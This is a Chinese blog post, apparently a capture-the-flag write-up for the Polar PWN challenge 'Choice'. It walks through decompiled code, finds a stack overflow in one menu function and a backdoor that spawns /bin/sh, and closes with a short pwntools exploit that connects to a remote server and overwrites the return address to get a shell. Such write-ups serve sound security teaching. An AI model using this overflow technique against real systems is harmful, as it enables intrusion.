Polar_D&N_PWN_Choice

最新推荐文章于 2024-07-24 21:16:11 发布
最新推荐文章于 2024-07-24 21:16:11 发布
阅读量117 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73720466/article/details/133845929
版权

一、查看题目信息

$ file Choice
$ checksec Choice

程序为64位elf文件,没有开启任何保护。

二、题目分析

将程序放到ida 里分析,查看main()函数:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF
 
  init(argc, argv, envp);
  puts(&s);
  puts("Menu:");
  puts(a1);
  puts(a2);
  puts(a3);
  __isoc99_scanf((__int64)&unk_400A75, (__int64)&v4);
  if ( v4 == 1 )
  {
    Data1();
  }
  else if ( v4 == 2 )
  {
    Data2();
  }
  else
  {
    Data3();
  }
  return 0;
}

发现Data1()函数和Data2()和Data3()函数。

先进入`Data1()函数中:

int Data1()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400A78);
  read(0, buf, 0x35uLL);
  return printf(&format);
}
​

没有发现问题。

进入Data2()

int Data2()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400AA8);
  read(0, buf, 0x35uLL);
  return printf(&format);
}

接着进入Data3()函数中分析:

int Data3()
{
  char buf[48]; // [rsp+0h] [rbp-30h] BYREF
 
  puts(&byte_400AD0);
  read(0, buf, 0x50uLL);
  return printf(&format);
}

我们分别点开函数发现,三者中唯有Data3存在足够的溢出可以使我们进一步操作。

同时我们发现函数中存在后门函数shell

int Shell()
{
  return system("/bin/sh");
}

三、解题思路

那么,这道题的大致思路已经明了

1、选择Data3(见ps)

2、构造栈溢出

3、getshell

那么久直接开始写脚本吧

四、编写脚本

EXP

from pwn import*
r = remote("123.60.135.228",2144)
r.sendline("9")
shell = 0x004007bd
payload = 'a' * 48 + 'a' * 8
payload += p64(shell)
r.sendline(payload)
r.interactive()
m0_73720466
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
polar_matlabpolar_matlab_polarcode_Polar_matlab_polar_源码
10-02
在 MATLAB 环境中,Polar 代码是一种用于信道编码的重要技术,它由艾里·阿龙森(Eli Arikan)于2009年提出。Polar 代码利用信道极化现象,使得信息能够在经过编码后通过信道传输时,能够达到接近香农极限的错误纠正...
pp.rar_polar_polar si8000
09-23
标题中的“pp.rar_polar_polar si8000”暗示了这是一份与Polar编码相关的学习资源,其中可能包含对Polar码技术的详细解释。Polar码是一种先进的错误纠正编码技术,由土耳其科学家艾尔达尔·阿里坎在2008年提出。这种...
polar代码MATLAB (1).rar_Matlab代码_Polar码_polar_polar coding_sc译码
07-14
1. 构建Polar码生成矩阵:通常使用N×N的BCH矩阵,N是编码长度。 2. 输入信息比特:根据编码率,确定信息比特的数量,并将其与生成矩阵相乘得到编码比特序列。 3. 冻结位设置:将某些位(根据信道条件)设定为已知值...
BICM_Polar_TVT.zip_BICM polar_polar_polar BICM_polar code
07-15
Polar code for bicm channels
MCS.13TransmissionLines.rar_polar_polar code
09-21
在IT领域,尤其是在通信工程和数字信号处理中,"Polar Code"是一种重要的编码技术,主要应用于纠错编码和数据传输。本压缩包文件"MCS.13TransmissionLines.rar"聚焦于Polar码在传输线(Transmission Lines)中的应用...
谷粒商城实战笔记-38-前端基础-Vue-指令-单向绑定&双向绑定
epitomizelu的专栏
07-20 1004
安全性v-text更安全,因为它总是将数据作为纯文本插入,不解析 HTML。v-html则可能引发安全问题,因为它会解析并渲染 HTML 标签。用途v-text适用于插入文本数据,而v-html适用于插入需要被解析为实际 HTML 的数据。处理 HTML 标签v-text忽略 HTML 标签,将其视为普通文本;v-html则会解析并显示 HTML 标签。二者都是单向绑定,元素绑定model,model不绑定元素,元素值改变时model值不会更新。
deepseek-vl 论文阅读笔记
samoyan的博客,记录技术成长~
07-22 1059
我们的语言模型基于DeepSeek LLM(DeepSeek-AI,2024),其微设计大体遵循LLaMA(Touvron等,2023a,b)的设计,采用带有RMSNorm(Zhang和Sennrich,2019)函数的Pre-Norm结构,并使用SwiGLU(Shazeer,2020)作为前馈网络(FFN)的激活函数,中间层维度为8/3模型维度。此外,我们引入了一种新的“模态预热”策略。为了促进创新并支持广泛的应用需求,我们公开了两个版本的模型,分别为1.3B和7B,以满足不同计算能力的需求。
ZYNQ 入门笔记(零):概述
记录代码与生活
07-21 744
作为 AMD Xilinx SoC 的重要组成部分之一,Zynq 系列在视频编码、网络加速、射频信号处理等领域占据重要地位,其将 ARM 硬核 (PS) 与可编程逻辑 (PL) 集成在一块芯片内部,在提升系统整体性能的同时简化了设计流程。然而,初次接触 Zynq 的开发者可能会面临诸多困难,如工具链、开发流程、Block Design、AXI 总线、PS & PL 交互、联合调试等。笔者在此将学习过程中的笔记加以整理,希望能帮助大家快速入门 Zynq,体会软硬件联合开发的乐趣
OpenGL笔记十四之GLM数学库的配置与使用
小勇博客
07-20 393
— 2024-07-20 中午。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 990
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
江科大/江协科技 STM32学习笔记P6
sususu_2001的博客
07-19 337
AHB(Advanced High-performance Bus), 高速总线,用来接高速外设的。APB (Advanced Peripheral Bus) 低速总线,用来接低速外设的。APB2一般是和AHB同频率,都是72MHz,APB1一般是36MHz。APB2连接的一般是外设中稍微重要的部分,比如GPIO端口,还有一些外设的一号,比如USART1、SPI1、TIM1、TIM8,还接ADC、EXTI、AFIO。其他的2、3、4…外设和DAC、PWR、BKP等次要点的外设都放到APB1。
【Blockly图形化积木编程二次开发学习笔记】5.自动保存与恢复
乙酸氧铍的博客
07-21 203
/ 用户离开页面时自动将块备份到本地存储中。关闭后再次打开,工作区仍存在。// 从本地存储中恢复块。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
gzx233的博客
07-20 909
Shell脚本的使用
SAP PP学习笔记31 - 计划运行的步骤2 - Scheduling(日程计算),BOM Explosion(BOM展开)
shi_ly的专栏
07-24 408
本章主要讲Scheduling(日程计算),其中包括 外部调达中的调度,生产订单中的调度,修改需求日期(其实就是在物料中增加安全时间和BOM中的提前期偏置量)。另外还讲了BOM展开的内容,详细讲了BOM选择的各种方法,除了按数量选BOM之外,还有其他比如 按日期,按生产版本等,而其中按日期又分为按订单开始日期,订单终了日期等,越趋复杂。
C++笔记3:基类指针delete子类对象的内存泄漏问题
subtitle_的博客
07-21 240
C++笔记3:基类指针delete子类对象的内存泄漏问题
MISRA C2012学习笔记(7)-Rules 8.12
赞的博客
07-20 707
为便于理解以下示例,应注意,1u 的基本类型是 unsigned char,而 1UL 的基本类型是 unsigned long。在下面这个示例中,表达式 DELAY + WIDTH 的值为 70000,但是在具有 16 位 int 类型的计算机上,该。所有这些都是合规的,但取决于 a,b 和 c 的类型,具有多个运算符的任何表达式都可能违反其他规则。,可以消除程序员的期望与事实不符的可能性。下面的示例显示具有单目或后缀运算符的表达式,其操作数是主表达式或顶级运算符具有优先级 15 的表达式。
Vue3企业级项目开发实战课-笔记记录
tuku0801的专栏
07-20 985
实践 Vue 3 自研组件库开发、Node.js 服务端开发、Vue 3 结合 Node.js 的全栈项目开发以及全栈项目的单元测试等大厂常见的项目技术场景
Cadence23学习笔记(七)
zjb6668的博客
07-20 300
三种信号联通的方式:如何旋转元器件:先像下图一样选中器件,之后按住快捷键R即可旋转:设置栅格大小:这里的栅格数值越大,格点越密集。放置分页符号:cadence中分页的话必须放置分页符!!!!单纯的net alia不能使用,与嘉立创不同!!!off-page connector与net alia性质差不多,但是前者只能在多个页面之间互连,后者只能在一个页面的内部形成互连,它们的name所代表的都是网络名称,不用太讲究信号的流向,但最好规范一下。一个发送,一个接收。
【学习笔记】子集DP
最新发布
Brute♂force
07-24 631
有一类问题和子集有关。给你一个集合S,令T为S的超集,也就是S所有子集的集合,求T中所有元素的和。
polar_opts
11-14
以下是关于polar_opts的介绍和演示: polar_opts是pyecharts中极坐标图的配置项,可以通过设置polar_angleaxis_opts和polar_radiusaxis_opts来调整极坐标图的角度轴和半径轴的样式和属性。例如,可以通过设置polar_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值